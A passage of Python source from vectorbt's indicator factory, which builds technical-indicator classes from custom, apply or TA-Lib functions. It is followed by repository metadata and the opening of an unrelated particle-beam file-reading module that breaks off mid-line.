for output_name in all_output_names: def output_prop(_self, _output_name=output_name): return _self.wrapper.wrap(getattr(_self, '_' + _output_name)) if output_name in in_output_names: output_prop.__doc__ = """In-place output array.""" else: output_prop.__doc__ = """Output array.""" output_prop.__name__ = output_name if output_name in output_flags: _output_flags = output_flags[output_name] if isinstance(_output_flags, (tuple, list)): _output_flags = ', '.join(_output_flags) output_prop.__doc__ += "\n\n" + _output_flags setattr(Indicator, output_name, property(output_prop)) # Add __init__ method def __init__(_self, wrapper, input_list, input_mapper, in_output_list, output_list, param_list, mapper_list, short_name, level_names): perform_init_checks( wrapper, input_list, input_mapper, in_output_list, output_list, param_list, mapper_list, short_name, level_names ) Wrapping.__init__( _self, wrapper, input_list=input_list, input_mapper=input_mapper, in_output_list=in_output_list, output_list=output_list, param_list=param_list, mapper_list=mapper_list, short_name=short_name, level_names=level_names ) for i, ts_name in enumerate(input_names): setattr(_self, f'_{ts_name}', input_list[i]) setattr(_self, '_input_mapper', input_mapper) for i, in_output_name in enumerate(in_output_names): setattr(_self, f'_{in_output_name}', in_output_list[i]) for i, output_name in enumerate(output_names): setattr(_self, f'_{output_name}', output_list[i]) for i, param_name in enumerate(param_names): setattr(_self, f'_{param_name}_array', param_list[i]) setattr(_self, f'_{param_name}_mapper', mapper_list[i]) if len(param_names) > 1: tuple_mapper = list(zip(*list(mapper_list))) setattr(_self, '_tuple_mapper', tuple_mapper) else: tuple_mapper = None setattr(_self, '_short_name', short_name) setattr(_self, '_level_names', level_names) # Initialize indexers mapper_sr_list = [] for i, m in enumerate(mapper_list): mapper_sr_list.append(pd.Series(m, index=wrapper.columns)) if tuple_mapper is not None: mapper_sr_list.append(pd.Series(tuple_mapper, index=wrapper.columns)) ParamIndexer.__init__( _self, mapper_sr_list, level_names=[*level_names, tuple(level_names)] ) setattr(Indicator, '__init__', __init__) # Add user-defined outputs for prop_name, prop in custom_output_props.items(): if prop.__doc__ is None: prop.__doc__ = f"""Custom property.""" if not isinstance(prop, (property, cached_property)): prop.__name__ = prop_name prop = cached_property(prop) setattr(Indicator, prop_name, prop) # Add comparison & combination methods for all inputs, outputs, and user-defined properties for attr_name in all_attr_names: _attr_settings = attr_settings.get(attr_name, {}) checks.assert_dict_valid(_attr_settings, [['dtype']]) dtype = _attr_settings.get('dtype', np.float_) if checks.is_namedtuple(dtype): def attr_readable(_self, attr_name=attr_name, enum=dtype): if _self.wrapper.ndim == 1: return getattr(_self, attr_name).map(lambda x: '' if x == -1 else enum._fields[x]) return getattr(_self, attr_name).applymap(lambda x: '' if x == -1 else enum._fields[x]) attr_readable.__qualname__ = f'{Indicator.__name__}.{attr_name}_readable' attr_readable.__doc__ = f"""{attr_name} in readable format based on enum {dtype}.""" setattr(Indicator, f'{attr_name}_readable', property(attr_readable)) elif np.issubdtype(dtype, np.number): def assign_numeric_method(func_name, combine_func, attr_name=attr_name): def numeric_method(_self, other, crossover=False, wait=0, after_false=True, level_name=None, prepend_name=prepend_name, **kwargs): if isinstance(other, _self.__class__): other = getattr(other, attr_name) if level_name is None: if prepend_name: if attr_name == _self.short_name: level_name = f'{_self.short_name}_{func_name}' else: level_name = f'{_self.short_name}_{attr_name}_{func_name}' else: level_name = f'{attr_name}_{func_name}' out = combine_objs( getattr(_self, attr_name), other, combine_func=combine_func, level_name=level_name, **kwargs ) if crossover: return out.vbt.signals.nst(wait + 1, after_false=after_false) return out numeric_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}' numeric_method.__doc__ = f"""Return True for each element where `{attr_name}` is {func_name} `other`. Set `crossover` to True to return the first True after crossover. Specify `wait` to return True only when `{attr_name}` is {func_name} for a number of time steps in a row after crossover. See `vectorbt.indicators.factory.combine_objs`.""" setattr(Indicator, f'{attr_name}_{func_name}', numeric_method) assign_numeric_method('above', np.greater) assign_numeric_method('below', np.less) assign_numeric_method('equal', np.equal) elif np.issubdtype(dtype, np.bool_): def assign_bool_method(func_name, combine_func, attr_name=attr_name): def bool_method(_self, other, level_name=None, prepend_name=prepend_name, **kwargs): if isinstance(other, _self.__class__): other = getattr(other, attr_name) if level_name is None: if prepend_name: if attr_name == _self.short_name: level_name = f'{_self.short_name}_{func_name}' else: level_name = f'{_self.short_name}_{attr_name}_{func_name}' else: level_name = f'{attr_name}_{func_name}' return combine_objs( getattr(_self, attr_name), other, combine_func=combine_func, level_name=level_name, **kwargs ) bool_method.__qualname__ = f'{Indicator.__name__}.{attr_name}_{func_name}' bool_method.__doc__ = f"""Return `{attr_name} {func_name.upper()} other`. See `vectorbt.indicators.factory.combine_objs`.""" setattr(Indicator, f'{attr_name}_{func_name}', bool_method) assign_bool_method('and', np.logical_and) assign_bool_method('or', np.logical_or) assign_bool_method('xor', np.logical_xor) self.Indicator = Indicator def from_custom_func(self, custom_func, require_input_shape=False, param_settings=None, in_output_settings=None, hide_params=None, hide_default=True, var_args=False, keyword_only_args=False, **pipeline_kwargs): """Build indicator class around a custom calculation function. In contrast to `IndicatorFactory.from_apply_func`, this method offers full flexbility. It's up to we to handle caching and concatenate columns for each parameter (for example, by using `vectorbt.base.combine_fns.apply_and_concat_one`). Also, you should ensure that each output array has an appropriate number of columns, which is the number of columns in input arrays multiplied by the number of parameter combinations. Args: custom_func (callable): A function that takes broadcast arrays corresponding to `input_names`, broadcast in-place output arrays corresponding to `in_output_names`, broadcast parameter arrays corresponding to `param_names`, and other arguments and keyword arguments, and returns outputs corresponding to `output_names` and other objects that are then returned with the indicator instance. Can be Numba-compiled. !!! note Shape of each output should be the same and match the shape of each input stacked n times (= the number of parameter values) along the column axis. require_input_shape (bool): Whether to input shape is required. param_settings (dict): A dictionary of parameter settings keyed by name. See `run_pipeline` for keys. Can be overwritten by any run method. in_output_settings (dict): A dictionary of in-place output settings keyed by name. See `run_pipeline` for keys. Can be overwritten by any run method. hide_params (list): Parameter names to hide column levels for. Can be overwritten by any run method. hide_default (bool): Whether to hide column levels of parameters with default value. Can be overwritten by any run method. var_args (bool): Whether run methods should accept variable arguments (`*args`). Set to True if `custom_func` accepts positional agruments that are not listed in the config. keyword_only_args (bool): Whether run methods should accept keyword-only arguments (`*`). Set to True to force the user to use keyword arguments (e.g., to avoid misplacing arguments). **pipeline_kwargs: Keyword arguments passed to `run_pipeline`. Can be overwritten by any run method. Can contain default values for `param_names` and `in_output_names`, but also custom positional and keyword arguments passed to the `custom_func`. Returns: `Indicator`, and optionally other objects that are returned by `custom_func` and exceed `output_names`. ## Example The following example produces the same indicator as the `IndicatorFactory.from_apply_func` example. ```python-repl >>> @njit >>> def apply_func_nb(i, ts1, ts2, p1, p2, arg1, arg2): ... return ts1 * p1[i] + arg1, ts2 * p2[i] + arg2 >>> @njit ... def custom_func(ts1, ts2, p1, p2, arg1, arg2): ... return vbt.base.combine_fns.apply_and_concat_multiple_nb( ... len(p1), apply_func_nb, ts1, ts2, p1, p2, arg1, arg2) >>> MyInd = vbt.IndicatorFactory( ... input_names=['ts1', 'ts2'], ... param_names=['p1', 'p2'], ... output_names=['o1', 'o2'] ... ).from_custom_func(custom_func, var_args=True, arg2=200) >>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100) >>> myInd.o1 custom_p1 1 2 custom_p2 3 4 a b a b 2020-01-01 101.0 105.0 102.0 110.0 2020-01-02 102.0 104.0 104.0 108.0 2020-01-03 103.0 103.0 106.0 106.0 2020-01-04 104.0 102.0 108.0 104.0 2020-01-05 105.0 101.0 110.0 102.0 >>> myInd.o2 custom_p1 1 2 custom_p2 3 4 a b a b 2020-01-01 206.0 230.0 208.0 240.0 2020-01-02 212.0 224.0 216.0 232.0 2020-01-03 218.0 218.0 224.0 224.0 2020-01-04 224.0 212.0 232.0 216.0 2020-01-05 230.0 206.0 240.0 208.0 ``` The difference between `apply_func_nb` here and in `IndicatorFactory.from_apply_func` is that here it takes the index of the current parameter combination that can be used for parameter selection. You can also remove the entire `apply_func_nb` and define your logic in `custom_func` (which shouldn't necessarily be Numba-compiled): ```python-repl >>> @njit ... def custom_func(ts1, ts2, p1, p2, arg1, arg2): ... input_shape = ts1.shape ... n_params = len(p1) ... out1 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_) ... out2 = np.empty((input_shape[0], input_shape[1] * n_params), dtype=np.float_) ... for k in range(n_params): ... for col in range(input_shape[1]): ... for i in range(input_shape[0]): ... out1[i, input_shape[1] * k + col] = ts1[i, col] * p1[k] + arg1 ... out2[i, input_shape[1] * k + col] = ts2[i, col] * p2[k] + arg2 ... return out1, out2 ``` """ Indicator = self.Indicator short_name = self.short_name prepend_name = self.prepend_name input_names = self.input_names param_names = self.param_names in_output_names = self.in_output_names output_names = self.output_names all_input_names = input_names + param_names + in_output_names setattr(Indicator, 'custom_func', custom_func) def _merge_settings(old_settings, new_settings, allowed_keys=None): new_settings = merge_dicts(old_settings, new_settings) if len(new_settings) > 0 and allowed_keys is not None: checks.assert_dict_valid(new_settings, allowed_keys) return new_settings def _resolve_refs(input_list, param_list, in_output_list): # You can reference anything between inputs, parameters, and in-place outputs # even parameter to input (thanks to broadcasting) all_inputs = list(input_list + param_list + in_output_list) for i in range(len(all_inputs)): input = all_inputs[i] is_default = False if isinstance(input, DefaultParam): input = input.value is_default = True if isinstance(input, str): if input in all_input_names: new_input = all_inputs[all_input_names.index(input)] if is_default: new_input = DefaultParam(new_input) all_inputs[i] = new_input input_list = all_inputs[:len(input_list)] all_inputs = all_inputs[len(input_list):] param_list = all_inputs[:len(param_list)] in_output_list = all_inputs[len(param_list):] return input_list, param_list, in_output_list def _extract_inputs(args): input_list = args[:len(input_names)] checks.assert_len_equal(input_list, input_names) args = args[len(input_names):] param_list = args[:len(param_names)] checks.assert_len_equal(param_list, param_names) args = args[len(param_names):] in_output_list = args[:len(in_output_names)] checks.assert_len_equal(in_output_list, in_output_names) args = args[len(in_output_names):] if not var_args and len(args) > 0: raise TypeError("Variable length arguments are not supported by this function " "(var_args is set to False)") input_list, param_list, in_output_list = _resolve_refs(input_list, param_list, in_output_list) return input_list, param_list, in_output_list, args for k, v in pipeline_kwargs.items(): if k in param_names and not isinstance(v, DefaultParam): pipeline_kwargs[k] = DefaultParam(v) # track default params pipeline_kwargs = merge_dicts({k: None for k in in_output_names}, pipeline_kwargs) # Display default parameters and in-place outputs in the signature default_kwargs = {} for k in list(pipeline_kwargs.keys()): if k in input_names or k in param_names or k in in_output_names: default_kwargs[k] = pipeline_kwargs.pop(k) if var_args and keyword_only_args: raise ValueError("var_args and keyword_only_args cannot be used together") # Add private run method def_run_kwargs = dict( short_name=short_name, hide_params=hide_params, hide_default=hide_default, **default_kwargs ) @classmethod def _run(cls, *args, _param_settings=param_settings, _in_output_settings=in_output_settings, _pipeline_kwargs=pipeline_kwargs, **kwargs): _short_name = kwargs.pop('short_name', def_run_kwargs['short_name']) _hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params']) _hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default']) _param_settings = _merge_settings( _param_settings, kwargs.pop('param_settings', {}), [param_names] ) _in_output_settings = _merge_settings( _in_output_settings, kwargs.pop('in_output_settings', {}), [in_output_names] ) if _hide_params is None: _hide_params = [] args = list(args) # Extract inputs input_list, param_list, in_output_list, args = _extract_inputs(args) # Prepare column levels level_names = [] hide_levels = [] for i, pname in enumerate(param_names): level_name = _short_name + '_' + pname if prepend_name else pname level_names.append(level_name) if pname in _hide_params or (_hide_default and isinstance(param_list[i], DefaultParam)): hide_levels.append(i) level_names = list(level_names) param_list = [params.value if isinstance(params, DefaultParam) else params for params in param_list] # Run the pipeline results = run_pipeline( len(output_names), # number of returned outputs custom_func, *args, require_input_shape=require_input_shape, input_list=input_list, in_output_list=in_output_list, param_list=param_list, level_names=level_names, hide_levels=hide_levels, param_settings=[_param_settings.get(n, {}) for n in param_names], in_output_settings=[_in_output_settings.get(n, {}) for n in in_output_names], **merge_dicts(_pipeline_kwargs, kwargs) ) # Return the raw result if any of the flags are set if kwargs.get('return_raw', False) or kwargs.get('return_cache', False): return results # Unpack the result wrapper, \ new_input_list, \ input_mapper, \ in_output_list, \ output_list, \ new_param_list, \ mapper_list, \ other_list = results # Create a new instance obj = cls( wrapper, new_input_list, input_mapper, in_output_list, output_list, new_param_list, mapper_list, short_name, level_names ) if len(other_list) > 0: return (obj, *tuple(other_list)) return obj setattr(Indicator, '_run', _run) # Add public run method # Create function dynamically to provide user with a proper signature def compile_run_function(func_name, docstring, default_kwargs): pos_names = [] main_kw_names = [] other_kw_names = [] for k in input_names + param_names: if k in default_kwargs: main_kw_names.append(k) else: pos_names.append(k) main_kw_names.extend(in_output_names) # in_output_names are keyword-only for k, v in default_kwargs.items(): if k not in pos_names and k not in main_kw_names: other_kw_names.append(k) _0 = func_name _1 = '*, ' if keyword_only_args else '' _2 = [] if require_input_shape: _2.append('input_shape') _2.extend(pos_names) _2 = ', '.join(_2) + ', ' if len(_2) > 0 else '' _3 = '*args, ' if var_args else '' _4 = ['{}={}'.format(k, k) for k in main_kw_names + other_kw_names] _4 = ', '.join(_4) + ', ' if len(_4) > 0 else '' _5 = docstring _6 = all_input_names _6 = ', '.join(_6) + ', ' if len(_6) > 0 else '' _7 = [] if require_input_shape: _7.append('input_shape') _7.extend(other_kw_names) _7 = ['{}={}'.format(k, k) for k in _7] _7 = ', '.join(_7) + ', ' if len(_7) > 0 else '' func_str = "@classmethod\n" \ "def {0}(cls, {1}{2}{3}{4}**kwargs):\n" \ " \"\"\"{5}\"\"\"\n" \ " return cls._{0}({6}{3}{7}**kwargs)".format( _0, _1, _2, _3, _4, _5, _6, _7 ) scope = {**dict(DefaultParam=DefaultParam), **default_kwargs} filename = inspect.getfile(lambda: None) code = compile(func_str, filename, 'single') exec(code, scope) return scope[func_name] _0 = self.class_name _1 = '' if len(self.input_names) > 0: _1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names)) if len(self.in_output_names) > 0: _1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names)) if len(self.param_names) > 0: _1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names)) if len(self.output_names) > 0: _1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names)) run_docstring = """Run `{0}` indicator. {1} Pass a list of parameter names as `hide_params` to hide their column levels. Set `hide_default` to False to show the column levels of the parameters with a default value. Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.""".format(_0, _1) run = compile_run_function('run', run_docstring, def_run_kwargs) setattr(Indicator, 'run', run) if len(param_names) > 0: # Add private run_combs method def_run_combs_kwargs = dict( r=2, param_product=False, comb_func=itertools.combinations, speedup=True, short_names=None, hide_params=hide_params, hide_default=hide_default, **default_kwargs ) @classmethod def _run_combs(cls, *args, _param_settings=param_settings, **kwargs): _r = kwargs.pop('r', def_run_combs_kwargs['r']) _param_product = kwargs.pop('param_product', def_run_combs_kwargs['param_product']) _comb_func = kwargs.pop('comb_func', def_run_combs_kwargs['comb_func']) _speedup = kwargs.pop('speedup', def_run_combs_kwargs['speedup']) _short_names = kwargs.pop('short_names', def_run_combs_kwargs['short_names']) _hide_params = kwargs.pop('hide_params', def_run_kwargs['hide_params']) _hide_default = kwargs.pop('hide_default', def_run_kwargs['hide_default']) _param_settings = _merge_settings( _param_settings, kwargs.get('param_settings', {}), # get, not pop [param_names] ) if _hide_params is None: _hide_params = [] if _short_names is None: _short_names = [f'{short_name}_{str(i + 1)}' for i in range(_r)] args = list(args) # Extract inputs input_list, param_list, in_output_list, args = _extract_inputs(args) # Hide params for i, pname in enumerate(param_names): if _hide_default and isinstance(param_list[i], DefaultParam): if pname not in _hide_params: _hide_params.append(pname) param_list[i] = param_list[i].value checks.assert_len_equal(param_list, param_names) # Prepare params param_settings_list = [_param_settings.get(n, {}) for n in param_names] for i in range(len(param_list)): is_tuple = param_settings_list[i].get('is_tuple', False) is_array_like = param_settings_list[i].get('is_array_like', False) param_list[i] = params_to_list(param_list[i], is_tuple, is_array_like) if _param_product: param_list = create_param_product(param_list) else: param_list = broadcast_params(param_list) if not isinstance(param_list, (tuple, list)): param_list = [param_list] # Speed up by pre-calculating raw outputs if _speedup: raw_results = cls._run( *input_list, *param_list, *in_output_list, *args, return_raw=True, speedup=False, **kwargs ) kwargs['use_raw'] = raw_results # use them next time # Generate indicator instances instances = [] if _comb_func == itertools.product: param_lists = zip(*_comb_func(zip(*param_list), repeat=_r)) else: param_lists = zip(*_comb_func(zip(*param_list), _r)) for i, param_list in enumerate(param_lists): instances.append(cls._run( *input_list, *zip(*param_list), *in_output_list, *args, short_name=_short_names[i], hide_params=_hide_params, hide_default=_hide_default, speedup=False, **kwargs )) return tuple(instances) setattr(Indicator, '_run_combs', _run_combs) # Add public run_combs method _0 = self.class_name _1 = '' if len(self.input_names) > 0: _1 += '\n* Inputs: ' + ', '.join(map(lambda x: f'`{x}`', self.input_names)) if len(self.in_output_names) > 0: _1 += '\n* In-place outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.in_output_names)) if len(self.param_names) > 0: _1 += '\n* Parameters: ' + ', '.join(map(lambda x: f'`{x}`', self.param_names)) if len(self.output_names) > 0: _1 += '\n* Outputs: ' + ', '.join(map(lambda x: f'`{x}`', self.output_names)) run_combs_docstring = """Create a combination of multiple `{0}` indicators using function `comb_func`. {1} `comb_func` must accept an iterable of parameter tuples and `r`. Also accepts all combinatoric iterators from itertools such as `itertools.combinations`. Pass `r` to specify how many indicators to run. Pass `short_names` to specify the short name for each indicator. Set `speedup` to True to first compute raw outputs for all parameters, and then use them to build each indicator (faster). Other keyword arguments are passed to `{0}.run`.""".format(_0, _1) run_combs = compile_run_function('run_combs', run_combs_docstring, def_run_combs_kwargs) setattr(Indicator, 'run_combs', run_combs) return Indicator def from_apply_func(self, apply_func, cache_func=None, pass_packed=False, kwargs_to_args=None, numba_loop=False, use_ray=False, ray_kwargs=None, **kwargs): """Build indicator class around a custom apply function. In contrast to `IndicatorFactory.from_custom_func`, this method handles a lot of things for you, such as caching, parameter selection, and concatenation. Your part is writing a function `apply_func` that accepts a selection of parameters (single values as opposed to multiple values in `IndicatorFactory.from_custom_func`) and does the calculation. It then automatically concatenates the resulting arrays into a single array per output. While this approach is simpler, it's also less flexible, since we can only work with one parameter selection at a time and can't view all parameters. The UDF `apply_func` also can't take keyword arguments, nor it can return anything other than outputs listed in `output_names`. !!! note If `apply_func` is a Numba-compiled function: * All inputs are automatically converted to NumPy arrays * Each argument in `*args` must be of a Numba-compatible type * You cannot pass keyword arguments * Your outputs must be arrays of the same shape, data type and data order Args: apply_func (callable): A function that takes inputs, selection of parameters, and other arguments, and does calculations to produce outputs. Arguments are passed to `apply_func` in the following order: * `input_shape` if `pass_input_shape` is set to True and `input_shape` not in `kwargs_to_args` * `col` if `per_column` and `pass_col` are set to True and `col` not in `kwargs_to_args` * broadcast time-series arrays corresponding to `input_names` * broadcast in-place output arrays corresponding to `in_output_names` * single parameter selection corresponding to `param_names` * variable arguments if `var_args` is set to True * arguments listed in `kwargs_to_args` * `flex_2d` if `pass_flex_2d` is set to True and `flex_2d` not in `kwargs_to_args` * keyword arguments if `apply_func` is not Numba-compiled Can be Numba-compiled. !!! note Shape of each output should be the same and match the shape of each input. cache_func (callable): A caching function to preprocess data beforehand. Takes the same arguments as `apply_func`. Should return a single object or a tuple of objects. All returned objects will be passed unpacked as last arguments to `apply_func`. Can be Numba-compiled. pass_packed (bool): Whether to pass packed tuples for inputs, in-place outputs, and parameters. kwargs_to_args (list of str): Keyword arguments from `kwargs` dict to pass as positional arguments to the apply function. Should be used together with `numba_loop` set to True since Numba doesn't support variable keyword arguments. Defaults to []. Order matters. numba_loop (bool): Whether to loop using Numba. Set to True when iterating large number of times over small input, but note that Numba doesn't support variable keyword arguments. **kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`. Returns: Indicator Additionally, each run method now supports `use_ray` argument, which indicates whether to use Ray to execute `apply_func` in parallel. Only works with `numba_loop` set to False. See `vectorbt.base.combine_fns.ray_apply` for related keyword arguments. ## Example The following example produces the same indicator as the `IndicatorFactory.from_custom_func` example. ```python-repl >>> @njit ... def apply_func_nb(ts1, ts2, p1, p2, arg1, arg2): ... return ts1 * p1 + arg1, ts2 * p2 + arg2 >>> MyInd = vbt.IndicatorFactory( ... input_names=['ts1', 'ts2'], ... param_names=['p1', 'p2'], ... output_names=['o1', 'o2'] ... ).from_apply_func( ... apply_func_nb, var_args=True, ... kwargs_to_args=['arg2'], arg2=200) >>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100) >>> myInd.o1 custom_p1 1 2 custom_p2 3 4 a b a b 2020-01-01 101.0 105.0 102.0 110.0 2020-01-02 102.0 104.0 104.0 108.0 2020-01-03 103.0 103.0 106.0 106.0 2020-01-04 104.0 102.0 108.0 104.0 2020-01-05 105.0 101.0 110.0 102.0 >>> myInd.o2 custom_p1 1 2 custom_p2 3 4 a b a b 2020-01-01 206.0 230.0 208.0 240.0 2020-01-02 212.0 224.0 216.0 232.0 2020-01-03 218.0 218.0 224.0 224.0 2020-01-04 224.0 212.0 232.0 216.0 2020-01-05 230.0 206.0 240.0 208.0 ``` """ Indicator = self.Indicator setattr(Indicator, 'apply_func', apply_func) if kwargs_to_args is None: kwargs_to_args = [] module_name = self.module_name output_names = self.output_names in_output_names = self.in_output_names param_names = self.param_names num_ret_outputs = len(output_names) # Build a function that selects a parameter tuple # Do it here to avoid compilation with Numba every time custom_func is run _0 = "i" _0 += ", args_before" _0 += ", input_tuple" if len(in_output_names) > 0: _0 += ", in_output_tuples" if len(param_names) > 0: _0 += ", param_tuples" _0 += ", *args" if not numba_loop: _0 += ", **_kwargs" _1 = "*args_before" if pass_packed: _1 += ", input_tuple" if len(in_output_names) > 0: _1 += ", in_output_tuples[i]" else: _1 += ", ()" if len(param_names) > 0: _1 += ", param_tuples[i]" else: _1 += ", ()" else: _1 += ", *input_tuple" if len(in_output_names) > 0: _1 += ", *in_output_tuples[i]" if len(param_names) > 0: _1 += ", *param_tuples[i]" _1 += ", *args" if not numba_loop: _1 += ", **_kwargs" func_str = "def select_params_func({0}):\n return apply_func({1})".format(_0, _1) scope = {'apply_func': apply_func} filename = inspect.getfile(lambda: None) code = compile(func_str, filename, 'single') exec(code, scope) select_params_func = scope['select_params_func'] if module_name is not None: select_params_func.__module__ = module_name if numba_loop: select_params_func = njit(select_params_func) def custom_func(input_list, in_output_list, param_list, *args, input_shape=None, col=None, flex_2d=None, return_cache=False, use_cache=None, use_ray=False, **_kwargs): """Custom function that forwards inputs and parameters to `apply_func`.""" if use_ray: if len(in_output_names) > 0: raise ValueError("Ray doesn't support in-place outputs") if numba_loop: if use_ray: raise ValueError("Ray cannot be used within Numba") if num_ret_outputs > 1: apply_and_concat_func = combine_fns.apply_and_concat_multiple_nb elif num_ret_outputs == 1: apply_and_concat_func = combine_fns.apply_and_concat_one_nb else: apply_and_concat_func = combine_fns.apply_and_concat_none_nb else: if num_ret_outputs > 1: if use_ray: apply_and_concat_func = combine_fns.apply_and_concat_multiple_ray else: apply_and_concat_func = combine_fns.apply_and_concat_multiple elif num_ret_outputs == 1: if use_ray: apply_and_concat_func = combine_fns.apply_and_concat_one_ray else: apply_and_concat_func = combine_fns.apply_and_concat_one else: if use_ray: raise ValueError("Ray requires regular outputs") apply_and_concat_func = combine_fns.apply_and_concat_none n_params = len(param_list[0]) if len(param_list) > 0 else 1 input_tuple = tuple(input_list) in_output_tuples = list(zip(*in_output_list)) param_tuples = list(zip(*param_list)) args_before = () if input_shape is not None and 'input_shape' not in kwargs_to_args: args_before += (input_shape,) if col is not None and 'col' not in kwargs_to_args: args_before += (col,) # Pass some keyword arguments as positional (required by numba) more_args = () for key in kwargs_to_args: value = _kwargs.pop(key) # important: remove from kwargs more_args += (value,) if flex_2d is not None and 'flex_2d' not in kwargs_to_args: more_args += (flex_2d,) # Caching cache = use_cache if cache is None and cache_func is not None: _in_output_list = in_output_list _param_list = param_list if checks.is_numba_func(cache_func): if len(in_output_list) > 0: _in_output_list = [to_typed_list(in_outputs) for in_outputs in in_output_list] if len(param_list) > 0: _param_list = [to_typed_list(params) for params in param_list] cache = cache_func( *args_before, *input_tuple, *_in_output_list, *_param_list, *args, *more_args, **_kwargs ) if return_cache: return cache if cache is None: cache = () if not isinstance(cache, tuple): cache = (cache,) if len(in_output_names) > 0: _in_output_tuples = in_output_tuples if numba_loop: _in_output_tuples = to_typed_list(_in_output_tuples) _in_output_tuples = (_in_output_tuples,) else: _in_output_tuples = () if len(param_names) > 0: _param_tuples = param_tuples if numba_loop: _param_tuples = to_typed_list(_param_tuples) _param_tuples = (_param_tuples,) else: _param_tuples = () return apply_and_concat_func( n_params, select_params_func, args_before, input_tuple, *_in_output_tuples, *_param_tuples, *args, *more_args, *cache, **_kwargs ) return self.from_custom_func(custom_func, as_lists=True, **kwargs) @classmethod def from_talib(cls, func_name, init_kwargs=None, **kwargs): """Build indicator class around a TA-Lib function. Requires [TA-Lib](https://github.com/mrjbq7/ta-lib) installed. For input, parameter and output names, see [docs](https://github.com/mrjbq7/ta-lib/blob/master/docs/index.md). Args: func_name (str): Function name. init_kwargs (dict): Keyword arguments passed to `IndicatorFactory`. **kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`. Returns: Indicator ## Example ```python-repl >>> SMA = vbt.IndicatorFactory.from_talib('SMA') >>> sma = SMA.run(price, timeperiod=[2, 3]) >>> sma.real sma_timeperiod 2 3 a b a b 2020-01-01 NaN NaN NaN NaN 2020-01-02 1.5 4.5 NaN NaN 2020-01-03 2.5 3.5 2.0 4.0 2020-01-04 3.5 2.5 3.0 3.0 2020-01-05 4.5 1.5 4.0 2.0 ``` To get help on a function, use the `help` command: ```python-repl >>> help(SMA.run) Help on method run: run(close, timeperiod=30, short_name='sma', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance Run `SMA` indicator. * Inputs: `close` * Parameters: `timeperiod` * Outputs: `real` Pass a list of parameter names as `hide_params` to hide their column levels. Set `hide_default` to False to show the column levels of the parameters with a default value. Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`. ``` """ import talib from talib import abstract talib_func = getattr(talib, func_name) info = abstract.Function(func_name)._Function__info input_names = [] for in_names in info['input_names'].values(): if isinstance(in_names, (list, tuple)): input_names.extend(list(in_names)) else: input_names.append(in_names) class_name = info['name'] class_docstring = "{}, {}".format(info['display_name'], info['group']) short_name = info['name'].lower() param_names = list(info['parameters'].keys()) output_names = info['output_names'] output_flags = info['output_flags'] def apply_func(input_list, _, param_tuple): # TA-Lib functions can only process 1-dim arrays n_input_cols = input_list[0].shape[1] outputs = [] for col in range(n_input_cols): outputs.append(talib_func( *map(lambda x: x[:, col], input_list), *param_tuple )) if isinstance(outputs[0], tuple): # multiple outputs outputs = list(zip(*outputs)) return list(map(np.column_stack, outputs)) return np.column_stack(outputs) TALibIndicator = cls( **merge_dicts( dict( class_name=class_name, class_docstring=class_docstring, short_name=short_name, input_names=input_names, param_names=param_names, output_names=output_names, output_flags=output_flags ), init_kwargs ) ).from_apply_func( apply_func, pass_packed=True, **info['parameters'], **kwargs ) return TALibIndicator
8cf1a15642d330e409b9b8f3de5b9c053fe45d01
ea1d88d99e854ceb7f5620bd371349acb51f6607
/SimulationFramework/Modules/read_beam_file.py
3b751981b3a0cbed54c6f0a08b7091980e5de51f
[]
no_license
VELA-CLARA-software/SimFramed
7dee4efc86531662495eed1bf2a3e9ec8287b640
b647590f8cb87ea2bffed6733012b6e9141032bb
refs/heads/master
2022-12-07T05:13:46.486342
2020-08-10T13:52:13
2020-08-10T13:52:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
56,824
py
import os, time, csv, sys, subprocess import copy import h5py import numpy as np import munch import scipy.constants as constants from scipy.spatial.distance import cdist from scipy.spatial import ConvexHull from scipy.stats import gaussian_kde from itertools import compress try: import sdds except: print('sdds failed to load') pass sys.path.append(os.path.abspath(__file__+'/../../')) import SimulationFramework.Modules.read_gdf_file as rgf import SimulationFramework.Modules.minimumVolumeEllipse as mve MVE = mve.EllipsoidTool() class beam(munch.Munch): particle_mass = constants.m_e E0 = particle_mass * constants.speed_of_light**2 E0_eV = E0 / constants.elementary_charge q_over_c = (constants.elementary_charge / constants.speed_of_light) speed_of_light = constants.speed_of_light def __init__(self, sddsindex=0): self.beam = {} self.sddsindex = sddsindex def set_particle_mass(self, mass=constants.m_e): self.particle_mass = mass def normalise_to_ref_particle(self, array, index=0,subtractmean=False): array = copy.copy(array) array[1:] = array[0] + array[1:] if subtractmean: array = array - array[0]#np.mean(array) return array def reset_dicts(self): self.beam = {} self.twiss = {} self.slice = {} self._tbins = [] self._pbins = [] def read_SDDS_beam_file(self, fileName, charge=None, ascii=False): self.reset_dicts() self.sdds = sdds.SDDS(self.sddsindex) self.sdds.load(fileName) for col in range(len(self.sdds.columnName)): if len(self.sdds.columnData[col]) == 1: self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col][0]) else: self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col]) self.SDDSparameters = dict() for param in range(len(self.sdds.parameterName)): self.SDDSparameters[self.sdds.parameterName[param]] = self.sdds.parameterData[param] # print 'self.SDDSparameterNames = ', self.SDDSparameterNames self.beam['code'] = "SDDS" cp = self.beam['p'] * self.E0_eV cpz = cp / np.sqrt(self.beam['xp']**2 + self.beam['yp']**2 + 1) cpx = self.beam['xp'] * cpz cpy = self.beam['yp'] * cpz self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c self.beam['t'] = self.beam['t'] self.beam['z'] = (-1*self.Bz * constants.speed_of_light) * 